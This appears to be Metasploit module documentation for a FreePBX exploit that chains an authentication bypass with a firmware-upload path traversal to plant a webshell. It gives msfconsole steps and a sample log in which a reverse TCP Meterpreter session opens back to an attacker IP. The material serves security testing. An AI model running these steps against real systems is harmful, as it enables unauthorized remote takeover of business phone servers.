## Vulnerable Application

FreePBX is an open-source IP PBX management tool that provides a modern phone system for businesses
that use VoIP to make and receive phone calls. Versions prior to 16.0.44,16.0.92 and 17.0.6,17.0.23
are vulnerable to multiple CVEs, specifically CVE-2025-66039 and CVE-2025-61678, in the context of
this module. The versions before 16.0.44 and 17.0.23 are vulnerable to CVE-2025-66039, while
versions before 16.0.92 and 17.0.6 are vulnerable to CVE-2025-61678. The
former represents an authentication bypass: when FreePBX uses Webserver Authorization Mode
(an option the admin can enable), it allows an attacker to authenticate as any user. The latter
allows unrestricted file uploads via firmware upload, including path traversal. These vulnerabilities
allow unauthenticated remote code execution by bypassing authentication and placing a webshell in the
web server’s directory.

To setup the environment, perform minimal installation from [here](https://downloads.freepbxdistro.org/ISO/SNG7-PBX16-64bit-2302-1.iso).
Note that **Authorization Type** needs to be set to **webserver**:

1. Login into FreePBX Administration
1. Settings -> Advanced Settings
1. Change **Authorization Type** to **webserver**

Finally, the FreePBX needs to be activated to access vulnerable APIs:

1. Log into FreePBX Administraton
1. Admin -> System Admin
1. Activate instance

## Verification Steps

1. Install FreePBX
1. Start msfconsole
1. Do: `use unix/http/freepbx_firmware_file_upload`
1. Do: `set RHOSTS [target IP address]`
1. Do: `set USERNAME [FreePBX user]`
1. Do: `set LHOST [attacker IP]`
1. Do: `run`
1. You should get a shell.

## Options

### USERNAME

Performing authentication bypass requires the username of an existing user.

## Scenarios


```
msf exploit(unix/http/freepbx_firmware_file_upload) > run verbose=true
[*] Started reverse TCP handler on 192.168.3.7:4444
[*] Trying to bypass authentication...
[+] Bypass successful, trying upload webshell...
[+] Upload successful, triggering...
[*] Sending stage (41503 bytes) to 10.5.134.168
[+] Deleted ../qzwzkep1
[*] Meterpreter session 1 opened (192.168.3.7:4444 -> 10.5.134.168:51276) at 2026-01-28 11:27:32 +0100


meterpreter > sysinfo
Computer        : freepbx.sangoma.local
OS              : Linux freepbx.sangoma.local 3.10.0-1127.19.1.el7.x86_64 #1 SMP Tue Aug 25 17:23:54 UTC 2020 x86_64
Architecture    : x64
System Language : C
Meterpreter     : php/linux
meterpreter > getuid
Server username: asterisk

```

